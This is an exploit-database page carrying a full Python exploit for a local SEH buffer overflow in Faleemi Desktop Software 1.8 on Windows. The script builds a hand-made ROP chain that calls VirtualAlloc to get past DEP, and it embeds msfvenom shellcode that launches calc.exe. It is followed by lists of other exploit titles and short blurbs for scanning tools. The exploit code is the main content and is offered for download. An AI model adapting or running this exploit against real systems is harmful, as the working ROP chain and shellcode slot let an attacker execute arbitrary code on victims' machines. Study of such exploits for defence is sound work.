Menu

Search for hundreds of thousands of exploits

"Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)"

Author

Exploit author

bzyo

Platform

Exploit platform

windows

Release date

Exploit published date

2019-01-28

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
#!/usr/bin/python

# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)
# Date: 01-26-19
# Vulnerable Software: Faleemi Desktop Software 1.8
# Vendor Homepage: https://www.faleemi.com/
# Version: 1.8.0 
# Software Link 1: http://support.faleemi.com/fsc776/Faleemi_v1.8.exe
# Tested Windows 7 SP1 x86

# PoC
# 1. run script
# 2. open/copy contents of faleemidep.txt  
# 3. open app, click on System Setup
# 4. paste contents of faleemidep.txt in "Save Path for Snapshot and Record file" field 
# 5. click on save
# 6. pop calc

# manually created ropchain based on mona.py 'rop.txt' and 'ropfunc.txt' finds
# practicing dep bypass by not using auto generated mona.py ropchains

# original seh poc from Gionathan "John" Reale, EDB: 45402

# badchars; \x00\x0a\x0d\x2f

import struct   
filename = "faleemidep.txt"

junk = "A" * 264

#0x6001ea7e # ADD ESP,0B34 # POP EBX # POP EBP # POP ESI # POP EDI # RETN
seh = "\x7e\xea\x01\x60"
fill = "C"*524 

#VirtualAlloc()
#EDI = ROP NOP (RETN)
rop = struct.pack('<L',0x60018221)  # POP EDI # RETN 
rop += struct.pack('<L',0x60018222) # ROP-NOP

#ECX = flProtect (0x40)
rop += struct.pack('<L',0x60047e71)  # POP ECX # RETN 
rop += struct.pack('<L',0xffffffff)  
for i in range(0,65): rop += struct.pack('<L',0x6004bcc7)  # INC ECX # RETN 

#ESI = ptr to VirtualAlloc()
rop += struct.pack('<L',0x6004aaca)  # POP EAX # RETN 
rop += struct.pack('<L',0x6004f0bc)  # ptr to &VirtualAlloc() 
rop += struct.pack('<L',0x68b88b96)  # MOV EAX,DWORD PTR DS:[EAX] # RETN
rop += struct.pack('<L',0x73d63c82)  # XCHG EAX,ESI # RETN 
	
#EDX = flAllocationType (0x1000)
# Math 1)FFFFFFFF - 0cc48368 = 0F33B7C97 Math 2)0F33B7C97 + 1001 = F33B8C98)
rop += struct.pack('<L',0x68b832d3) # MOV EDX,0CC48368 # RETN 
rop += struct.pack('<L',0x60036b1c) # POP EBX # RETN 

rop += struct.pack('<L',0xF33B8C98)
rop += struct.pack('<L',0x6004e5ce)  # ADD EDX,EBX # POP EBX # RETN 0x10
rop += struct.pack('<L',0x60018222)  # ROP-NOP #compensate for POP and RETN 10
rop += struct.pack('<L',0x60018222)  # ROP-NOP #compensate for POP and RETN 10
rop += struct.pack('<L',0x60018222)  # ROP-NOP #compensate for POP and RETN 10
rop += struct.pack('<L',0x60018222)  # ROP-NOP #compensate for POP and RETN 10
rop += struct.pack('<L',0x60018222)  # ROP-NOP #compensate for POP and RETN 10
rop += struct.pack('<L',0x60018222)  # ROP-NOP #compensate for POP and RETN 10

#EBP = ReturnTo (ptr to jmp esp)
#!mona jmp -r esp -cpb '\x00\x0a\x0d\x2f'
rop += struct.pack('<L',0x68b901e9) # POP EBP # RETN 
rop += struct.pack('<L',0x73dd4206) # jmp esp 
      
#EBX = dwSize (0x1)
rop += struct.pack('<L',0x73dbfebc) # POP EBX # RETN 
rop += struct.pack('<L',0xffffffff) 
rop += struct.pack('<L',0x73dcbe1c) # INC EBX # XOR EAX,EAX # RETN
rop += struct.pack('<L',0x73dcbe1c) # INC EBX # XOR EAX,EAX # RETN

#EAX = NOP (0x90909090)
rop += struct.pack('<L',0x6004aaca)  # POP EAX # RETN
rop += struct.pack('<L',0x90909090)  # NOPs

#PUSHAD	
rop += struct.pack('<L',0x6004bd85) # PUSHAD # RETN

nops = "\x90"*10

#msfvenom -p windows/exec cmd=calc.exe -b "\x00\x0a\x0d\x2f" -f python
calc =  ""
calc += "\xd9\xf7\xb8\x0c\xa1\xba\x34\xd9\x74\x24\xf4\x5b\x29"
calc += "\xc9\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43\x18\x43"
calc += "\x4f\xc8\xc8\x01\xb0\x31\x08\x66\x38\xd4\x39\xa6\x5e"
calc += "\x9c\x69\x16\x14\xf0\x85\xdd\x78\xe1\x1e\x93\x54\x06"
calc += "\x97\x1e\x83\x29\x28\x32\xf7\x28\xaa\x49\x24\x8b\x93"
calc += "\x81\x39\xca\xd4\xfc\xb0\x9e\x8d\x8b\x67\x0f\xba\xc6"
calc += "\xbb\xa4\xf0\xc7\xbb\x59\x40\xe9\xea\xcf\xdb\xb0\x2c"
calc += "\xf1\x08\xc9\x64\xe9\x4d\xf4\x3f\x82\xa5\x82\xc1\x42"
calc += "\xf4\x6b\x6d\xab\x39\x9e\x6f\xeb\xfd\x41\x1a\x05\xfe"
calc += "\xfc\x1d\xd2\x7d\xdb\xa8\xc1\x25\xa8\x0b\x2e\xd4\x7d"
calc += "\xcd\xa5\xda\xca\x99\xe2\xfe\xcd\x4e\x99\xfa\x46\x71"
calc += "\x4e\x8b\x1d\x56\x4a\xd0\xc6\xf7\xcb\xbc\xa9\x08\x0b"
calc += "\x1f\x15\xad\x47\x8d\x42\xdc\x05\xdb\x95\x52\x30\xa9"
calc += "\x96\x6c\x3b\x9d\xfe\x5d\xb0\x72\x78\x62\x13\x37\x76"
calc += "\x28\x3e\x11\x1f\xf5\xaa\x20\x42\x06\x01\x66\x7b\x85"
calc += "\xa0\x16\x78\x95\xc0\x13\xc4\x11\x38\x69\x55\xf4\x3e"
calc += "\xde\x56\xdd\x5c\x81\xc4\xbd\x8c\x24\x6d\x27\xd1"

pad = "D" * (7000-len(fill + rop + nops + calc))

buffer = junk + seh + fill + rop + nops + calc + pad

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2020-10-12 "MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated)" webapps php bzyo
2020-10-02 "MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated)" webapps php bzyo
2020-04-20 "Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)" local windows bzyo
2019-05-17 "Iperius Backup 6.1.0 - Privilege Escalation" local windows bzyo
2019-05-06 "NSClient++ 0.5.2.35 - Privilege Escalation" local windows bzyo
2019-02-14 "exacqVision ESM 5.12.2 - Privilege Escalation" local windows bzyo
2019-01-30 "10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)" local windows bzyo
2019-01-28 "Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)" local windows bzyo
2019-01-11 "Code Blocks 17.12 - Local Buffer Overflow (SEH) (Unicode)" local windows bzyo
2019-01-10 "RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)" local windows bzyo
2018-12-27 "Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "MAGIX Music Editor 3.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "Iperius Backup 5.8.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-20 "LanSpy 2.0.1.159 - Buffer Overflow (SEH) (Egghunter)" local windows_x86 bzyo
2018-12-20 "Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)" local windows bzyo
2018-12-11 "PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion" webapps multiple bzyo
2018-09-12 "SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS)" webapps windows bzyo
2018-09-12 "SynaMan 4.0 build 1488 - SMTP Credential Disclosure" webapps windows bzyo
2018-08-06 "AgataSoft Auto PingMaster 1.5 - Buffer Overflow (SEH)" local windows bzyo
2018-07-23 "Splinterware System Scheduler Pro 5.12 - Privilege Escalation" local windows bzyo
2018-07-23 "Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)" local windows bzyo
2018-05-06 "HWiNFO 5.82-3410 - Denial of Service" dos windows bzyo
2018-04-24 "RGui 3.4.4 - Local Buffer Overflow" local windows bzyo
2018-04-18 "Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities" webapps xml bzyo
2018-04-17 "Reaper 5.78 - Local Buffer Overflow" local windows bzyo
2018-04-09 "GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)" local windows bzyo
2018-04-02 "WebLog Expert Enterprise 9.4 - Privilege Escalation" local windows bzyo
2018-03-26 "LabF nfsAxe 3.7 - Privilege Escalation" local windows bzyo
2018-03-23 "WM Recorder 16.8.1 - Denial of Service" dos windows bzyo
2018-03-05 "Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow" local windows bzyo 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected